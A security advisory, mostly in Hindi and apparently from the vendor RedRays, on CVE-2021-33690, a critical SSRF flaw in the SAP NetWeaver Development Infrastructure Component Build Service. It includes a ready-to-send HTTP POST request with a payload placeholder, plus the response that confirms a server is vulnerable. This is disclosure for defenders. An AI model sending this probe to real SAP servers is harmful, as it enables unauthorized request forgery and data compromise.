
[CVE-2021-33690] SAP NetWeaver Development Infrastructure में सर्वर साइड रिक्वेस्ट फोर्जरी भेद्यता
[CVE-2021-33690] SAP NetWeaver Development Infrastructure में सर्वर-साइड रिक्वेस्ट फोर्जरी भेद्यता
Application: SAP NetWeaver AS Java
Versions Affected: SAP NetWeaver Development Infrastructure Component Build Service versions – 7.11, 7.20, 7.30, 7.31, 7.40, 7.50
Vendor URL: https://sap.com/
Bug: SSRF
Date of Public Advisory: June 1, 2023
Reference: [https://nvd.nist.gov/vuln/detail/CVE-2021-33690]
SAP Note: 3072955
SAP Approved Fixes: True
Status: analyzed and published
एडवाइज़री सूचना शीर्षक: [CVE-2021-33690] SAP NetWeaver Development Infrastructure में सर्वर-साइड रिक्वेस्ट फोर्जरी भेद्यता जोखिम: गंभीर एडवाइज़री URL: https://redrays.io/cve-2021-33690-server-side-request-forgery-vulnerability/ प्रकाशन तिथि: 1 जून, 2023
भेद्यता सूचना दूरस्थ रूप से शोषण योग्य: हाँ स्थानीय रूप से शोषण योग्य: नहीं
CVSS जानकारी CVSS v3.1 आधार स्कोर: 9.9 / 10 (AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H)
भेद्यता विवरण SAP NetWeaver Development Infrastructure Component Build Service के विभिन्न संस्करणों, अर्थात् 7.11, 7.20, 7.30, 7.31, 7.40 और 7.50 में सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) नामक एक भेद्यता की पहचान की गई है। SAP NetWeaver Development Infrastructure Component Build Service के भीतर यह कमजोरी उस हमलावर को, जिसके पास सर्वर तक पहुँच है, विशेष रूप से तैयार किए गए क्वेरी के माध्यम से प्रॉक्सी हमलों को अंजाम देने की क्षमता प्रदान करती है। ऐसे हमलों का परिणाम संवेदनशील सर्वर डेटा के पूर्ण समझौते के रूप में हो सकता है, जिससे उसकी उपलब्धता प्रभावित होती है। यह ध्यान देना अत्यंत आवश्यक है कि इस भेद्यता की गंभीरता इस बात पर निर्भर करती है कि SAP NetWeaver Development Infrastructure (NWDI) इंट्रानेट पर संचालित होता है या इंटरनेट पर। CVSS स्कोर की गणना सबसे खराब स्थिति के आधार पर की गई है, जो यह मानती है कि यह ऑनलाइन संचालित होता है।
तकनीकी विवरण
यह निर्धारित करने के लिए कि सर्वर SSRF के प्रति संवेदनशील है या नहीं, निम्नलिखित अनुरोध भेजें:
POST /tc.CBS.Appl/tcspseudo HTTP/1.1
Host: redrayssap:50000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
CBS=http://%YOUR_PAYLOAD%&USER=1&PWD=1&REQ_CONFIRM_DELAY=2000&ACTION=CONFIGURE
यदि निम्नलिखित प्रतिक्रिया प्राप्त होती है, तो यह भेद्यता की उपस्थिति को दर्शाता है:
<?xml version="1.0" encoding="UTF-8"?><Cause>Could not connect to the CBS.</Cause>
RedRays के बारे में RedRays एक अग्रणी साइबर सुरक्षा उद्यम है जो ERP प्रणालियों को आंतरिक धोखाधड़ी गतिविधियों और बाहरी साइबर खतरों से सुरक्षित रखता है। हमें बड़े निगमों और प्रबंधित सेवा प्रदाताओं के लिए मजबूत सुरक्षा समाधान प्रदान करने पर गर्व है, जो SAP, Oracle और Microsoft जैसी प्रमुख ERP प्रणालियों पर निर्भर हैं। उन्नत उपकरणों और रणनीतियों का उपयोग करते हुए, हम विश्व स्तर पर विस्तृत SAP वातावरणों में सक्रिय रूप से सुरक्षा की निगरानी और नियंत्रण करते हैं।
हमारा प्राथमिक लक्ष्य तकनीकी और व्यावसायिक दोनों दृष्टिकोणों से सुरक्षा अंतर को पाटना है, जिससे हमारे ग्राहकों का निर्बाध संचालन सुनिश्चित हो और उनके बहुमूल्य डेटा की सुरक्षा हो। RedRays में हम असाधारण ग्राहक सेवा और सहायता प्रदान करते हुए शीर्ष-स्तरीय सुरक्षा मानकों को बनाए रखने के लिए प्रतिबद्ध हैं।
RedRays अनुसंधान एवं विकास के बारे में RedRays की उपलब्धियों की आधारशिला हमारी अनुसंधान एवं विकास (R&D) इकाई में निहित है, जो महत्वपूर्ण कॉर्पोरेट अनुप्रयोगों में भेद्यताओं के अध्ययन और विश्लेषण में विशेषज्ञता रखती है। हमारी R&D पहलों को SAP, Oracle, Microsoft Dynamics और IBM जैसी अग्रणी सॉफ्टवेयर कंपनियों से मान्यता और प्रशंसा प्राप्त हुई है। अनुसंधान के प्रति यह समर्पण हमें उभरते खतरों का पूर्वानुमान लगाने और हमारे ग्राहकों की आवश्यकताओं को पूरा करने वाले विशेष सुरक्षा समाधान तैयार करने में सक्षम बनाता है।
हमारी टीम में अनुभवी पेशेवर शामिल हैं, जिनके पास भेद्यता मूल्यांकन, पेनेट्रेशन परीक्षण, घटना प्रबंधन और खतरा खुफिया जानकारी जैसे विभिन्न सुरक्षा क्षेत्रों में विविध कौशल हैं। हमारी प्रतिबद्धता कठोर अनुसंधान करने और SAP प्रणालियों को निरंतर बदलते खतरों से मजबूत करने के लिए अत्याधुनिक समाधान प्रदान करने की है।
किसी भी प्रश्न या अधिक जानकारी के लिए, बेझिझक संपर्क करें: